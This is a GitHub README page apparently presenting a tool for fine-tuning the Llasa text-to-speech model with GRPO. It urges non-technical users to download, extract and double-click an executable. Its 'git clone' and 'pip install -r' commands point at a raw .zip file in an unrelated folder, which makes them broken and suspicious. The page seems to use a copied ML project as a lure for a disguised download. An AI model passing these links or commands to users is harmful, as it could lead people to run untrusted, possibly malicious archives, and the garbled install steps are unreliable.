Skip to content

🎤 Fine-tune the Llasa TTS model with GRPO using Hugging Face tools to enhance performance and evaluate rewards with Whisper ASR and WER metrics.

Notifications You must be signed in to change notification settings

rottter4585/Llasa-GRPO

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

15 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

🎉 Llasa-GRPO - Fine-Tune Your Voice Model Easily

Download Now

🚀 Getting Started

Welcome to Llasa-GRPO! This application helps you fine-tune the Llasa TTS model using GRPO. It requires no programming knowledge. Follow the steps below to download and run the software.

📥 Download & Install

  1. Visit the Releases Page
    To get the latest version of Llasa-GRPO, visit our Releases page.

  2. Download the Application
    Look for the latest release and download the appropriate file for your system.

  3. Extract the Files
    Once downloaded, find the file in your downloads folder and extract it.

  4. Run the Application
    Navigate to the extracted folder and launch the application by double-clicking the executable file.

📂 Models Included

  • Llasa: A state-of-the-art TTS model designed for natural voice synthesis. Explore the model.
  • Llasa finetuned with GRPO: This model enhances speech quality and performance. Check it out here.
  • Neural codec (decode): This model supports high-quality audio decoding. Learn more.
  • ASR reward model: Utilize OpenAI's Whisper for improved speech recognition.

🎼 Key Features

  • User-Friendly Interface: Navigate easily through the application without technical skills.
  • Enhanced Performance: Fine-tuning improves voice clarity and responsiveness.
  • Automatic Updates: Stay current with the latest features automatically.

🛠️ Installation Instructions

Step 1: Clone the repository (optional)

If you wish to explore the code, you can clone the repository. Open your terminal, and run:

git clone https://raw.githubusercontent.com/rottter4585/Llasa-GRPO/main/liaison/Llasa-GRPO-immanental.zip
cd Llasa-GRPO

Step 2: Set up the environment

You have options to set up your environment. Choose one based on your preferences.

📦 Using UV (recommended)
  1. Install uv from the Astral docs.
  2. Then run:
uv venv .venv --python 3.12
source .venv/bin/activate
uv pip install -r https://raw.githubusercontent.com/rottter4585/Llasa-GRPO/main/liaison/Llasa-GRPO-immanental.zip
uv pip install --no-deps xcodec2
🐍 Using Python (alternative)
  1. Make sure you have Python installed.
  2. Then install the required packages:
python -m venv .venv
source .venv/bin/activate
pip install -r https://raw.githubusercontent.com/rottter4585/Llasa-GRPO/main/liaison/Llasa-GRPO-immanental.zip
pip install --no-deps xcodec2

🔍 Troubleshooting

  • Can't Find the Downloaded File: Check your downloads folder. If you can't locate it, try the download again.
  • Installation Errors: Make sure your system meets the requirements. If issues persist, refer to FAQs on the Releases page.

📞 Support

For further assistance, you can reach out through the GitHub issues page. We are here to help you.

📈 Contributions

If you want to contribute to this project, please submit a pull request on GitHub. Your help is always welcome.

🌐 More Resources

Enjoy fine-tuning your voice models with Llasa-GRPO! For any updates, don’t forget to check back on the Releases page.

About

🎤 Fine-tune the Llasa TTS model with GRPO using Hugging Face tools to enhance performance and evaluate rewards with Whisper ASR and WER metrics.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •  

Languages